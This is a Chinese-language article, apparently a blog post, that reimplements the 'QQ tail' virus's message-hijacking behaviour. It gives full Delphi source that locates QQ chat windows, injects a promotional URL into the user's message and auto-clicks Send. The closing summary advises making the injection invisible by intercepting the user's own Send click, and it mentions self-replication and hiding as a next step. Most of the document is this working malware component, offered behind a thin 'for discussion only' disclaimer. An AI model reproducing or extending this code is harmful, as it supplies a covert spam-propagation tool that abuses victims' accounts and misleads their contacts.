QQ尾巴病毒的發送原理分析

來ＱＱ尾巴病毒大肆發作，我也是經常收到網友們發到來的帶尾巴的消息，於是，好奇心一來，我也來研究研究此病毒的發作原理。首先，我不知道ＱＱ尾巴病毒真正的原理，我只是猜測並且自己寫了一個類似的程序來實現它。

 

ＱＱ尾巴的發作情況：當用戶打開一個ＱＱ消息發送窗口時，病毒會自動往消息文本框裡輸入文本，然後不等用戶反應過來就發出去了。

 

程序實現：首先要找到ＱＱ消息發送窗口的句柄以及消息文本框與「發送」按鈕的窗口句柄。

 

一、             如何找到ＱＱ消息發送窗口句柄：

ＱＱ消息發送窗口有兩種，一種是消息模式，在這種情況下，窗口標題含有「發送消息」字樣；一種是聊天模式，窗口標題含有「聊天中」字樣；

通過枚舉窗口就可找到相應的句柄：

// 取得ＱＱ的發送消息窗口

function GetQQWnd: HWND;

var

  hCurrentWindow: HWnd;

  WndText:String;

begin

  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);

  while hCurrentWindow <> 0 do

  begin

    WndText:=GetWndText(hCurrentWindow);

    if (Pos('聊天中',WndText)>0) or (Pos('發送消息',WndText)>0) then

    begin

      Result:=hCurrentWindow;

      Exit;

    end;

    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);

  end;

  Result:=0;

end;

 

二、             如何找到「發送」按鈕窗口句柄：

找到了ＱＱ的發送消息窗口後，就可以進一步查找「發送」按鈕句柄了，如窗口句柄為qqWnd，則可以用一個循環，查找文本中含有「發送」字樣的窗口，經過試驗發現，「發送」按鈕恰恰是窗體的第一個子窗口，這樣，可以用

btnWnd:=GetDlgItem(qqWnd,1);  // 發送按鈕

來獲得「發送」按鈕的句柄。

 

三、             如何找到消息文本框窗口句柄：

消息文本框並不好找，不過你可以先在消息文本框中輸入幾個字母，如「abcd」，這樣我們就可以用上述方法來查找了，不過通過實驗後，發現消息文本框並不是ＱＱ窗口的直接子窗口，而是其中一個子窗口的子窗口，通過實驗，可以用

txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD);  // 文本框

來獲得。

 

四、             如何獲得原消息文本框的文本：

要獲取原消息文本框的文本，只需要一個ＡＰＩ函數就行了，如下：

// 獲得窗口文本

function GetWndText(hWnd: HWND): String;

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;

  GetMem(mText,Ret);

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_GETTEXT,Ret,Buf);

    Result:=StrPas(mText);

  finally

    FreeMem(mText,Ret);

  end;

end;

 

五、             如何住原消息文本框裡追加文本：

與取文本相反

// 發送文本到窗口

procedure SetWndText(hWnd: HWND; Text: String);

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  GetMem(mText,Length(Text));

  StrCopy(mText,PChar(Text));

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_SETTEXT,0,Buf);

  finally

    FreeMem(mText,Length(Text));

  end;

end;

六、             如果讓「發送」按鈕自動點擊：

一切都準備好了，現在要開始發送了，為了讓消息自動發送，我們可以模擬「發送」按鈕被點擊了。

  SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);

  SendMessage(btnWnd,WM_LBUTTONUP,0,0);

通過模擬一個鼠標在「開始」按鈕上的按下與放開，就實現了點擊發送功能。

 

七、             其它的定時功能比較簡單，在此也不多說了。

 

八、             全部源代碼如下：

unit Unit1;

 

interface

 

uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls, ExtCtrls;

 

type

  TForm1 = class(TForm)

    Timer1: TTimer;

    Button1: TButton;

    Edit1: TEdit;

    Label1: TLabel;

    Button2: TButton;

    procedure Timer1Timer(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button2Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;

 

var

  Form1: TForm1;

 

implementation

 

{$R *.dfm}

 

// 獲得窗口文本

function GetWndText(hWnd: HWND): String;

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;

  GetMem(mText,Ret);

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_GETTEXT,Ret,Buf);

    Result:=StrPas(mText);

  finally

    FreeMem(mText,Ret);

  end;

end;

// 發送文本到窗口

procedure SetWndText(hWnd: HWND; Text: String);

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  GetMem(mText,Length(Text));

  StrCopy(mText,PChar(Text));

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_SETTEXT,0,Buf);

  finally

    FreeMem(mText,Length(Text));

  end;

end;

// 取得ＱＱ的發送消息窗口

function GetQQWnd: HWND;

var

  hCurrentWindow: HWnd;

  WndText:String;

begin

  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);

  while hCurrentWindow <> 0 do

  begin

    WndText:=GetWndText(hCurrentWindow);

    if (Pos('聊天中',WndText)>0) or (Pos('發送消息',WndText)>0) then

    begin

      Result:=hCurrentWindow;

      Exit;

    end;

    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);

  end;

  Result:=0;

end;

// 定時處理

procedure TimerProc;

var

  qqWnd,txtWnd,btnWnd:HWND;

  Msg:String;

begin

  qqWnd:=GetQQWnd;

  if qqWnd=0 then Exit;

 

  btnWnd:=GetDlgItem(qqWnd,1);  // 發送按鈕

  txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD);  // 文本框

  if (btnWnd=0) or (txtWnd=0) then Exit;

  Msg:=GetWndText(txtWnd);

  Msg:=Msg+#13+#10+'歡迎光臨綠蔭網絡http://www.lvyin.net&#39;;

  SetWndText(txtWnd,Msg);

  SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);

  SendMessage(btnWnd,WM_LBUTTONUP,0,0);

end;

 

procedure TForm1.Timer1Timer(Sender: TObject);

begin

  TimerProc;

end;

 

procedure TForm1.Button1Click(Sender: TObject);

begin

  Timer1.Enabled :=not Timer1.Enabled;

  if Timer1.Enabled then

    Button1.Caption :='停 止'

  else

    Button1.Caption :='開 始';

end;

 

procedure TForm1.Button2Click(Sender: TObject);

begin

  Timer1.Interval :=StrToInt(Edit1.Text);

end;

 

end.

 

       總結：上面只講述了ＱＱ消息自動發送的主要功能，這或許跟ＱＱ尾巴的原理不同（我也不知道），但總體上應該差不多。如果要做到讓用戶感覺不到異常，就要改一下了，不要自動發送，而是在當用戶點擊了「發送」按鈕後再把文本加進去。這樣的話可是攔截「發送」按鈕的點擊消息，然後再用上述方法把文本加進去，然後把消息交還原程序處理。至於如何讓它成為病毒，會自我複製，自我隱藏等功能，那又是另外一個話題了，在此就不多講了。

 

       另：此文只作技術研討之用，希望大家不要拿它來搗蛋，如有產生後果，本人概不負責。歡迎大家來信探討。